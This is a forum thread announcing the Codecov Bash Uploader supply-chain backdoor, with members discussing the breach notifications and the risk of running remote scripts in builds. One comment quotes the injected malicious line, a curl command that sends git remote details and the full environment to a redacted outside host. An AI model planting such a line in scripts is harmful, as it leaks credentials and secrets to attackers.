Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Register

Quick Links


Categories

In this Discussion

Important PSA - Codecov.IO Bash Uploader Security Update
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Important PSA - Codecov.IO Bash Uploader Security Update

nullnotherenullnothere Member
in General

There has been a fairly serious backdoor implanted resulting in credential leakage.

If you use/have used their tool, please be sure to revoke/rotate your credentials immediately.

More information:

https://about.codecov.io/security-update/

Ars Technica has coverage here: https://arstechnica.com/gadgets/2021/04/backdoored-developer-tool-that-stole-credentials-escaped-notice-for-3-months/

Thanked by 3drunkendog TimboJones bulbasaur

Comments

  • WilliamWilliam Member

    So somebody updates a core component, they do not notice for 3 months and then the line added is this? THIS?

    The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.

curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http://<redacted>/upload/v2 || true

    Not some company or software i would ever use.

  • alexvolkalexvolk Member
    edited April 2021

    I didn’t receive a communication from Codecov. Was I not affected? Collapse
    You may not have been affected. We have contacted users for whom we had email accounts and posted a notification in the app.

    Really? No email was received. Just logged in to my account and surprise:

    Action Required: You were Impacted by Codecov’s Bash Uploader Security Issue.
    Codecov recently disclosed a security issue. Based on our records, we believe you were impacted and should take immediate action.

  • Daniel15Daniel15 Veteran
    edited April 2021

    In news that should surprise nobody, downloading and executing an arbitrary shell script from a third party server as part of your build process may not be the most secure thing to do. You should really save a local copy to your repo so that changes can be properly audited.

  • nullnotherenullnothere Member

    @Daniel15 said: downloading and executing an arbitrary shell script from a third party server as part of your build process

    You'd be surprised at how many such issues go under reported and/or get masked under the veneer of automation.

    Sometime back, IIRC, there was a similar issue with some similar bad packages that were added into the Node package repository.

    This is definitely not going to be the end of such issues.

    An interesting read on a related issue is: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610

Sign In or Register to comment.